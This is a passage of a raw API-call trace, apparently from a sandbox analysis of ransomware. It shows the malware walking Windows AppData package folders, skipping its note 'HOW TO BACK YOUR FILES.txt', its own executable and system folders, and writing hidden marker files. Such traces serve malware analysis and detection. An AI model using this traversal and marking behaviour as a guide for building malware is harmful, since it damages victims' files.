lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf03f166f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf03f166f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf04177b9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.315] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.315] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.315] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf03f166f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf03f166f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf04177b9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.315] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0065.315] lstrcpyW (in: lpString1=0x130ec14, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.315] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.316] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.316] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.316] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.316] CloseHandle (hObject=0x2cc) returned 1 [0065.316] CloseHandle (hObject=0x2a0) returned 1 [0065.316] GetCurrentThreadId () returned 0xd98 [0065.316] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122108 [0065.316] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies" [0065.316] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x125ae0 | out: hHeap=0xe0000) returned 1 [0065.317] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122100 | out: hHeap=0xe0000) returned 1 [0065.317] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies" [0065.317] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies\\" [0065.317] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0065.317] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.318] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.320] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.321] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.321] CloseHandle (hObject=0x2a0) returned 1 [0065.321] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies") returned 109 [0065.321] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.321] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x833d38ba, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd107f9e7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf04177b9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0065.321] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.321] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.321] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.322] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.322] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x833d38ba, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd107f9e7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf04177b9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.322] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.322] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.322] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.322] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.322] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.322] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf04177b9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf04177b9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf04177b9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.322] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.322] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.322] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf04177b9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf04177b9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf04177b9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.322] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0065.322] lstrcpyW (in: lpString1=0x130ec14, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.322] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.323] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.323] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.323] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.323] CloseHandle (hObject=0x2cc) returned 1 [0065.324] CloseHandle (hObject=0x2a0) returned 1 [0065.324] GetCurrentThreadId () returned 0xd98 [0065.324] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fa8 [0065.324] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache" [0065.324] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11bb28 | out: hHeap=0xe0000) returned 1 [0065.324] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fa0 | out: hHeap=0xe0000) returned 1 [0065.324] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache" [0065.324] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache\\" [0065.324] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0065.324] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.325] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.328] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.329] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.329] CloseHandle (hObject=0x2a0) returned 1 [0065.329] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache") returned 107 [0065.329] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.329] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x833d38ba, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd107f5ea, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf04177b9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0065.330] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.330] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.330] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.330] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.330] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x833d38ba, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd107f5ea, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf04177b9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.330] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.330] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.330] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.330] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.330] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.330] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf04177b9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf04177b9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf043da56, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.330] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.330] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.330] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf04177b9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf04177b9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf043da56, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.330] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0065.330] lstrcpyW (in: lpString1=0x130ec10, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.330] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.331] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.331] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.331] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.331] CloseHandle (hObject=0x2cc) returned 1 [0065.331] CloseHandle (hObject=0x2a0) returned 1 [0065.331] GetCurrentThreadId () returned 0xd98 [0065.331] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x11cd68 [0065.331] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy" [0065.331] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x119158 | out: hHeap=0xe0000) returned 1 [0065.331] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11cd60 | out: hHeap=0xe0000) returned 1 [0065.331] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy" [0065.331] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\" [0065.331] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" [0065.331] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.335] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.338] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.338] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.339] CloseHandle (hObject=0x2a0) returned 1 [0065.339] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy") returned 82 [0065.339] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.339] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72644337, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x726dcc78, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf043da56, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0065.339] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.339] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.339] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.339] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.339] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72644337, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x726dcc78, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf043da56, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.339] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.339] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.340] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.340] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.340] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.340] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf043da56, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf043da56, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf043da56, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.340] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.340] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.340] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x726dcc78, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x726dcc78, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x726dcc78, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0065.340] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.340] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.340] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0065.340] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0065.340] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0065.340] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0065.340] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0065.340] 